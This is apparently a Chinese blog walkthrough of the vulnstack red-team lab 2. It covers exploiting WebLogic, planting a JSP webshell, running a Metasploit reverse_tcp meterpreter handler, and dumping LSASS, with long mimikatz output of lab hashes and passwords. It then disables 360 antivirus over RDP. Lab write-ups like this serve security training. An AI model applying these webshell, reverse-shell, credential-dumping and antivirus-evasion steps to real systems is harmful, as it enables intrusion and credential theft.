锐客网

  1. 首页 > 睿知 > it技术 > >

渗透靶场|渗透靶场--vulnstack-红队评估实战(2)

渗透测试渗透靶场

vulnstack-红队评估实战(2) 环境配置

攻击者: kali 192.168.154.129windows 192.168.154.1靶场: WEB:对外边界服务器 10.10.10.80 192.168.154.80PC:域成员 192.168.154.201 10.10.10.201DC:域控 10.10.10.10

1.外网主机信息搜集
nmap 扫描web服务器端口
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

发现开放了80和7001
80无内容,7001weblogic版本为10.3.6.0
直接上工具获得权限代码执行
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

上传冰蝎jsp脚本
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

把shell写到控制台images目录中
C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

【渗透靶场|渗透靶场--vulnstack-红队评估实战(2)】目录上传木马,访问
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

绕过360需要哥斯拉的JMeterpreter或者冰蝎的反弹shell
use exploit/multi/handler set payload java/meterpreter/reverse_tcp set lport 23334 set lhost ip run

2.上线cs
上线后用梼杌的sharpdump跑出密码文件下载下来解得到,或者直接cs执行也行
.#####.mimikatz 2.2.0 (x64) #19041 Jul5 2021 23:35:52 .## ^ ##."A La Vie, A L'Amour" - (oe.eo) ## / \ ##/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##> https://blog.gentilkiwi.com/mimikatz '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com ) '#####'> https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp'mimikatz(commandline) # sekurlsa::logonPasswords full Opening : 'lsass.dmp' file for minidump...Authentication Id : 0 ; 1377898 (00000000:0015066a) Session: CachedInteractive from 1 User Name: Administrator Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:48:44 SID: S-1-5-21-2756371121-2868759905-3853650604-500 msv : [00000003] Primary * Username : Administrator * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : Administrator * Domain: de1ay.com * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 1254898 (00000000:001325f2) Session: CachedInteractive from 1 User Name: Administrator Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:48:28 SID: S-1-5-21-2756371121-2868759905-3853650604-500 msv : [00000003] Primary * Username : Administrator * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : Administrator * Domain: de1ay.com * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 577210 (00000000:0008ceba) Session: Interactive from 1 User Name: mssql Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:47:06 SID: S-1-5-21-2756371121-2868759905-3853650604-2103 msv : [00000003] Primary * Username : mssql * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : mssql * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : mssql * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : mssql * Domain: DE1AY.COM * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session: Service from 0 User Name: WEB$ Domain: DE1AY Logon Server: (null) Logon Time: 2021/7/15 14:45:48 SID: S-1-5-20 msv : [00000003] Primary * Username : WEB$ * Domain: DE1AY * NTLM: 365fd8c1b308ccb808beea336bc56d64 * SHA1: ac867401325d0a76ded9593c34166f7efcc79c5f tspkg : wdigest : * Username : WEB$ * Domain: DE1AY * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 kerberos : * Username : web$ * Domain: de1ay.com * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 ssp : credman : Authentication Id : 0 ; 51042 (00000000:0000c762) Session: UndefinedLogonType from 0 User Name: (null) Domain: (null) Logon Server: (null) Logon Time: 2021/7/15 14:45:47 SID: msv : [00000003] Primary * Username : WEB$ * Domain: DE1AY * NTLM: 365fd8c1b308ccb808beea336bc56d64 * SHA1: ac867401325d0a76ded9593c34166f7efcc79c5f tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1849027 (00000000:001c36c3) Session: Service from 0 User Name: DefaultAppPool Domain: IIS APPPOOL Logon Server: (null) Logon Time: 2021/7/15 14:52:17 SID: S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : WEB$ * Domain: DE1AY * NTLM: 365fd8c1b308ccb808beea336bc56d64 * SHA1: ac867401325d0a76ded9593c34166f7efcc79c5f tspkg : * Username : WEB$ * Domain: DE1AY * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 wdigest : * Username : WEB$ * Domain: DE1AY * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 kerberos : * Username : WEB$ * Domain: de1ay.com * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 ssp : credman : Authentication Id : 0 ; 1234405 (00000000:0012d5e5) Session: CachedInteractive from 1 User Name: Administrator Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:48:13 SID: S-1-5-21-2756371121-2868759905-3853650604-500 msv : [00000003] Primary * Username : Administrator * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : Administrator * Domain: de1ay.com * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 884085 (00000000:000d7d75) Session: CachedInteractive from 1 User Name: Administrator Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:47:31 SID: S-1-5-21-2756371121-2868759905-3853650604-500 msv : [00000003] Primary * Username : Administrator * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : Administrator * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : Administrator * Domain: de1ay.com * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 995 (00000000:000003e3) Session: Service from 0 User Name: IUSR Domain: NT AUTHORITY Logon Server: (null) Logon Time: 2021/7/15 14:46:08 SID: S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain: (null) * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 173631 (00000000:0002a63f) Session: Service from 0 User Name: mssql Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:46:07 SID: S-1-5-21-2756371121-2868759905-3853650604-2103 msv : [00000003] Primary * Username : mssql * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : mssql * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : mssql * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : mssql * Domain: DE1AY.COM * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 150181 (00000000:00024aa5) Session: Service from 0 User Name: mssql Domain: DE1AY Logon Server: DC Logon Time: 2021/7/15 14:45:50 SID: S-1-5-21-2756371121-2868759905-3853650604-2103 msv : [00000003] Primary * Username : mssql * Domain: DE1AY * LM: f67ce55ac831223dc187b8085fe1d9df * NTLM: 161cff084477fe596a5db81874498a24 * SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d tspkg : * Username : mssql * Domain: DE1AY * Password : 1qaz@WSX wdigest : * Username : mssql * Domain: DE1AY * Password : 1qaz@WSX kerberos : * Username : mssql * Domain: DE1AY.COM * Password : 1qaz@WSX ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session: Service from 0 User Name: LOCAL SERVICE Domain: NT AUTHORITY Logon Server: (null) Logon Time: 2021/7/15 14:45:48 SID: S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain: (null) * Password : (null) kerberos : * Username : (null) * Domain: (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session: UndefinedLogonType from 0 User Name: WEB$ Domain: DE1AY Logon Server: (null) Logon Time: 2021/7/15 14:45:47 SID: S-1-5-18 msv : tspkg : wdigest : * Username : WEB$ * Domain: DE1AY * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 kerberos : * Username : web$ * Domain: DE1AY.COM * Password : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3 ssp : credman :

可知域为de1ay.com而控制器为DC,域内有mssql和Administrator用户密码为1qaz@WSX
3.远程连接关闭360
远程连接查看域计算机发现net行为也被360制止,那就dump本地用户尝试远程连接关闭360
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

得到de1ay密码为1qaz@WSX其他为空?
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

确认远程连接服务开启且端口后尝试连接
de1ay/administrator登录成功,可以关闭360
渗透靶场|渗透靶场--vulnstack-红队评估实战(2)
文章图片

4.内网信息搜集
利用域内administrator用户搜集域信息,然后smb直接全拿下

    推荐阅读


    上一篇:渗透测试|内网渗透-代理穿透-提权-注入-msf-中间件-域渗透-日志清除-学习资源

    下一篇:Vulnstack内网渗透|Vulnstack内网靶场渗透(ATT&CK实战系列-红队评估(七))